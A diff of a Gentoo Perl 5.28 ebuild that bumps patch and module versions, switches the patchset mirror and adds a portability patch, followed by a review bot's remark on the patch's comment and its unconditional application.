1390 @@ -5,18 +5,18 @@ EAPI=6
1391
1392 inherit eutils alternatives flag-o-matic toolchain-funcs multilib multiprocessing
1393
1394 -PATCH_VER=1
1395 +PATCH_VER=2
1396 CROSS_VER=1.2.2
1397 -PATCH_BASE="perl-5.28.0-patches-${PATCH_VER}"
1398 +PATCH_BASE="perl-5.28.2-patches-${PATCH_VER}"
1399 +PATCH_DEV=dilfridge
1400
1401 -PATCHES=( "${FILESDIR}"/5.28/${PN}-5.28.1-part{1,2,3,4,5}.patch )
1402 -
1403 -DIST_AUTHOR=XSAWYERX
1404 +DIST_AUTHOR=SHAY
1405
1406 # Greatest first, don't include yourself
1407 # Devel point-releases are not ABI-intercompatible, but stable point releases are
1408 # BIN_OLDVERSEN is contains only C-ABI-intercompatible versions
1409 -PERL_BIN_OLDVERSEN=""
1410 +PERL_BIN_OLDVERSEN="5.28.0"
1411 +
1412 if [[ "${PV##*.}" == "9999" ]]; then
1413 DIST_VERSION=5.28.0
1414 else
1415 @@ -42,7 +42,7 @@ SRC_URI="
1416 mirror://cpan/authors/id/${DIST_AUTHOR:0:1}/${DIST_AUTHOR:0:2}/${DIST_AUTHOR}/${MY_P}.tar.xz
1417 https://github.com/gentoo-perl/perl-patchset/releases/download/${PATCH_BASE}/${PATCH_BASE}.tar.xz
1418 mirror://gentoo/${PATCH_BASE}.tar.xz
1419 - https://dev.gentoo.org/~kentnl/distfiles/${PATCH_BASE}.tar.xz
1420 + https://dev.gentoo.org/~${PATCH_DEV}/distfiles/${PATCH_BASE}.tar.xz
1421 https://github.com/arsv/perl-cross/releases/download/${CROSS_VER}/perl-cross-${CROSS_VER}.tar.gz
1422 "
1423 HOMEPAGE="https://www.perl.org/"
1424 @@ -77,7 +77,7 @@ PDEPEND="
1425 S="${WORKDIR}/${MY_P}"
1426
1427 dual_scripts() {
1428 - src_remove_dual perl-core/Archive-Tar 2.280.0 ptar ptardiff ptargrep
1429 + src_remove_dual perl-core/Archive-Tar 2.300.0 ptar ptardiff ptargrep
1430 src_remove_dual perl-core/CPAN 2.200.0 cpan
1431 src_remove_dual perl-core/Digest-SHA 6.10.0 shasum
1432 src_remove_dual perl-core/Encode 2.970.0 enc2xs piconv
1433 @@ -85,7 +85,7 @@ dual_scripts() {
1434 src_remove_dual perl-core/ExtUtils-ParseXS 3.390.0 xsubpp
1435 src_remove_dual perl-core/IO-Compress 2.74.0 zipdetails
1436 src_remove_dual perl-core/JSON-PP 2.970.10 json_pp
1437 - src_remove_dual perl-core/Module-CoreList 5.201.806.220 corelist
1438 + src_remove_dual perl-core/Module-CoreList 5.201.904.190 corelist
1439 src_remove_dual perl-core/Pod-Parser 1.630.0 pod2usage podchecker podselect
1440 src_remove_dual perl-core/Pod-Perldoc 3.280.100 perldoc
1441 src_remove_dual perl-core/Test-Harness 3.420.0 prove
1442 @@ -305,6 +305,9 @@ src_prepare() {
1443 epatch "${FILESDIR}/${PN}-5.26.2-hppa.patch" # bug 634162
1444 fi
1445
1446 + # This fixes Storage/libperl segfaults on non glibc platforms
1447 + epatch "${FILESDIR}/5.28/${P}-portability.patch"
1448 +
1449 if [[ ${CHOST} == *-solaris* ]] ; then
1450 # do NOT mess with nsl, on Solaris this is always necessary,
1451 # when -lsocket is used e.g. to get h_errno
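Review bot: The added comment says `Storage/libperl`, which presumably means the Storable module that the patch touches, and it gives no bug number or upstream reference the way the hppa line above does (`# bug 634162`). The patch is also applied unconditionally although the comment scopes the problem to non-glibc platforms. If that is intended for this overlay, the comment could say so: `# Storable/libperl segfaults on non-glibc (musl) libcs; applied unconditionally, see <bug or upstream commit>`. src_prepare continues outside the hunk.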
1452 @@ -482,7 +485,7 @@ src_configure() {
1453
1454 # Use all host paths that might contain useful stuff, the hook above will filter out bad choices.
1455 local paths="/lib/*-linux-gnu /usr/lib/*-linux-gnu /lib64 /lib/64 /usr/lib64 /usr/lib/64 /lib32 /usr/lib32 /lib /usr/lib"
1456 - myconf "-Dlibpth="${EPREFIX}"/$(get_libdir) "${EPREFIX}"/usr/$(get_libdir) ${paths}"
1457 + myconf "-Dlibpth=${EPREFIX}/$(get_libdir) ${EPREFIX}/usr/$(get_libdir) ${paths}"
1458 elif [[ $(get_libdir) != "lib" ]] ; then
1459 # We need to use " and not ', as the written config.sh use ' ...
1460 myconf "-Dlibpth=/usr/local/$(get_libdir) /$(get_libdir) /usr/$(get_libdir)"